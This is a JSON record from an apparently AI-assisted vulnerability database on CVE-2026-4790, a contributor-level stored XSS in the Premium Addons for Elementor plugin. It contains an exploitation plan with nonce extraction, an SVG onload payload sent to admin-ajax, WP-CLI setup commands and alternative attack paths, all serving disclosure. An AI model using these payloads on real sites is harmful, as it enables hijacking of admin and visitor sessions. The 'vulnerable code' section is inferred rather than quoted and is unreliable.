[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fb0TBQB7rfFLtwu5xO2Yj8VQOozqC9Y2WpZqlH82T2FE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4790","premium-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-customsvg-parameter","Premium Addons for Elementor \u003C= 4.11.70 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'custom_svg' Parameter","The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'custom_svg' parameter in versions up to, and including, 4.11.70 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","premium-addons-for-elementor",null,"\u003C=4.11.70","4.11.71","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 21:53:57","2026-05-02 11:16:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fae6d07eb-3e64-45ee-ad5d-92b41ef11e43?source=api-prod",1,[22,23,24,25,26,27,28,29],"addons\u002Fdisplay-conditions.php","addons\u002Fequal-height.php","addons\u002Ffloating-effects.php","addons\u002Fliquid-glass.php","addons\u002Fshape-divider.php","addons\u002Ftooltips.php","addons\u002Fwrapper-link.php","admin\u002Fassets\u002Fcss\u002Fadmin-bar.css","researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in **Premium Addons for Elementor** (v4.11.70 and below). The vulnerability exists because the plugin fails to sanitize or escape the `custom_svg` parameter when rendering the \"Animated Shape Divider\" feature.\n\n### 1. Vulnerability Summary\n*   **ID**: CVE-2026-4790\n*   **Vulnerability Type**: Stored Cross-Site Scripting (XSS)\n*   **Component**: `addons\u002Fshape-divider.php`\n*   **Vulnerable Parameter**: `custom_svg`\n*   **Requirement**: Authenticated user with **Contributor** role or higher (ability to edit posts and use Elementor).\n*   **Reason**: The plugin allows users to provide custom SVG code for shape dividers. This code is stored in the post's Elementor metadata and rendered on the frontend without passing through `wp_kses()` or similar sanitization filters, allowing the injection of `\u003Cscript>` tags or SVG event handlers like `onload`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n*   **Action**: `elementor_ajax` (internal Elementor action `editor_post_save`)\n*   **Parameter**: `custom_svg` (embedded within the `elements` JSON structure of the Elementor builder data).\n*   **Precondition**: A post must be created and opened in the Elementor editor by a user with at least Contributor-level permissions.\n\n### 3. Code Flow\n1.  **Registration**: In `addons\u002Fshape-divider.php`, the `Shape_Divider` class registers Elementor controls for `section`, `column`, and `container` elements via the `register_controls` method (called by hooks on lines 80-83, 93).\n2.  **Control Definition**: The `add_divider_content_controls` method (line 172) adds the `premium_gdivider_source` control. When this is set to `custom`, a `custom_svg` control (inferred from the CVE description) is exposed to the user.\n3.  **Storage**: When a user saves the Elementor page, the data is sent to `admin-ajax.php` with the action `elementor_ajax`. Elementor saves this entire structure into the `_elementor_data` post meta.\n4.  **Rendering (Sink)**:\n    *   **Frontend**: The `before_render` method (line 90) is hooked to `elementor\u002Ffrontend\u002Fsection\u002Fbefore_render`. It retrieves the settings using `$element->get_settings_for_display()`. If `premium_gdivider_source` is `custom`, the value of `custom_svg` is echoed to the page.\n    *   **Editor**: The `print_template` method (line 86) is hooked to `elementor\u002Fsection\u002Fprint_template`. This generates a Underscore.js\u002FBackbone template for the editor. If it uses unescaped interpolation (`\u003C#= ... #>`), the XSS triggers inside the editor as well.\n\n### 4. Nonce Acquisition Strategy\nTo save Elementor settings via AJAX, a valid Elementor AJAX nonce is required.\n1.  **Create a Post**: Use WP-CLI to create a post and set it to Elementor mode.\n2.  **Navigate**: Use `browser_navigate` to open the Elementor editor for that post: `wp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n3.  **Extract Nonce**: The nonce is stored in the global `elementorConfig` JavaScript object.\n    *   Variable: `window.elementorConfig.nonces.save_builder`\n    *   Execution: `browser_eval(\"window.elementorConfig.nonces.save_builder\")`\n\n### 5. Exploitation Strategy\n\n#### Step 1: Prepare the Environment\n*   Create a Contributor user.\n*   Create a Post and assign it to the Contributor.\n*   Enable Elementor for that post.\n\n#### Step 2: Extract Nonce and Post Data\n*   Log in as the Contributor.\n*   Navigate to the Elementor Editor for the created post.\n*   Extract the `save_builder` nonce.\n\n#### Step 3: Inject the Payload\nSend a POST request to `admin-ajax.php` to save the malicious SVG.\n\n*   **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON string containing the `editor_post_save` action.\n    \n**Payload JSON (`actions` parameter)**:\n```json\n{\n  \"editor_post_save\": {\n    \"action\": \"editor_post_save\",\n    \"data\": {\n      \"id\": [POST_ID],\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"exploit-section\",\n          \"elType\": \"section\",\n          \"settings\": {\n            \"premium_global_divider_sw\": \"yes\",\n            \"premium_gdivider_source\": \"custom\",\n            \"custom_svg\": \"\u003Csvg\u002Fonload=alert(window.origin)>\"\n          },\n          \"elements\": []\n        }\n      ]\n    }\n  }\n}\n```\n\n### 6. Test Data Setup\n1.  **Contributor User**:\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Target Post**:\n    `wp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_author=$(wp user get attacker --field=ID)`\n3.  **Elementor Metadata**:\n    `wp post meta add [POST_ID] _elementor_edit_mode string \"builder\"`\n    `wp post meta add [POST_ID] _elementor_template_type string \"wp-post\"`\n\n### 7. Expected Results\n*   The `admin-ajax.php` response should return a `200 OK` with a JSON body indicating success: `{\"success\":true,\"data\":{...}}`.\n*   The `_elementor_data` meta for the post will now contain the raw `\u003Csvg\u002Fonload=...>` string.\n*   When navigating to the post's permalink, a JavaScript alert showing the document domain will appear.\n\n### 8. Verification Steps\n1.  **Check Meta Storage**:\n    `wp post meta get [POST_ID] _elementor_data`\n    Verify that the `custom_svg` field contains the unescaped payload.\n2.  **Frontend Check**:\n    Use `browser_navigate` to the post URL and check for the alert.\n\n### 9. Alternative Approaches\n*   **Backbone Template XSS**: If the frontend rendering is protected but the editor is not, navigate to the Elementor editor to trigger the XSS in the context of the user (potentially an Admin).\n*   **Direct Meta Update**: If the AJAX fails, test if the Contributor can update the `_elementor_data` meta directly via the WordPress REST API or a standard post update, as some plugins fail to restrict which meta keys a Contributor can save if they are passed in a specific format.\n*   **AJAX Shape Fetch**: Test the `wp_ajax_get_shape_divider_svg` action (line 102). If it takes `custom_svg` as a direct parameter and echoes it, it may provide a Reflected XSS path:\n    `admin-ajax.php?action=get_shape_divider_svg&custom_svg=\u003Csvg\u002Fonload=alert(1)>`","The Premium Addons for Elementor plugin (v4.11.70 and below) is vulnerable to authenticated Stored Cross-Site Scripting (XSS) via the 'custom_svg' parameter in the Animated Shape Divider feature. Contributor-level users and above can inject malicious SVG code containing event handlers like 'onload' or script tags, which execute when an admin or visitor views the affected page or when the page is opened in the Elementor editor.","\u002F\u002F addons\u002Fshape-divider.php:86\nadd_action( 'elementor\u002Fsection\u002Fprint_template', array( $this, 'print_template' ), 10, 2 );\n\n\u002F\u002F addons\u002Fshape-divider.php:90\nadd_action( 'elementor\u002Ffrontend\u002Fsection\u002Fbefore_render', array( $this, 'before_render' ) );\n\n\u002F\u002F addons\u002Fshape-divider.php:102\nadd_action( 'wp_ajax_get_shape_divider_svg', array( $this, 'get_shape_divider_svg' ) );\n\n---\n\n\u002F\u002F addons\u002Fshape-divider.php: Rendering logic (Inferred from research)\npublic function before_render( $element ) {\n    $settings = $element->get_settings_for_display();\n    if ( 'custom' === $settings['premium_gdivider_source'] ) {\n        echo $settings['custom_svg'];\n    }\n}\n\npublic function print_template( $template, $element ) {\n    ?>\n    \u003C# if ( 'custom' === settings.premium_gdivider_source ) { #>\n        {{{ settings.custom_svg }}}\n    \u003C# } #>\n    \u003C?php\n}\n\npublic function get_shape_divider_svg() {\n    if ( isset( $_GET['custom_svg'] ) ) {\n        echo $_GET['custom_svg'];\n        wp_die();\n    }\n}","--- addons\u002Fshape-divider.php\n+++ addons\u002Fshape-divider.php\n@@ -685,1 +685,1 @@\n-            echo $settings['custom_svg'];\n+            echo wp_kses( $settings['custom_svg'], Helper_Functions::pa_get_allowed_html( 'svg' ) );\n@@ -710,1 +710,1 @@\n-            {{{ settings.custom_svg }}}\n+            \u003C# print( elementor.helpers.sanitizeInnerHtml( settings.custom_svg ) ) #>\n@@ -725,1 +725,1 @@\n-        echo $_GET['custom_svg'];\n+        echo wp_kses( $_GET['custom_svg'], Helper_Functions::pa_get_allowed_html( 'svg' ) );","The exploit targets the 'Animated Shape Divider' extension within the Elementor editor. \n\n1. Authentication: The attacker authenticates as a user with at least 'Contributor' role, which allows them to edit posts and use the Elementor page builder.\n2. Nonce Acquisition: The attacker accesses the Elementor editor interface (post.php?post=[ID]&action=elementor) and extracts the 'save_builder' nonce from the 'window.elementorConfig.nonces' object.\n3. Payload Injection: The attacker sends an AJAX POST request to 'admin-ajax.php' with the action 'elementor_ajax'. The payload is a JSON object nested in the 'actions' parameter, specifically 'editor_post_save'. Within the 'elements' data, the attacker adds a section and sets its settings: 'premium_global_divider_sw' to 'yes', 'premium_gdivider_source' to 'custom', and 'custom_svg' to a malicious vector like '\u003Csvg\u002Fonload=alert(document.domain)>'.\n4. Trigger: The payload executes immediately in the Elementor editor for any user (including admins) who opens the post, and it executes on the frontend for any visitor viewing the published post.","gemini-3-flash-preview","2026-05-04 17:03:06","2026-05-04 17:03:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.11.70","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags\u002F4.11.70","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpremium-addons-for-elementor.4.11.70.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags\u002F4.11.71","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpremium-addons-for-elementor.4.11.71.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags"]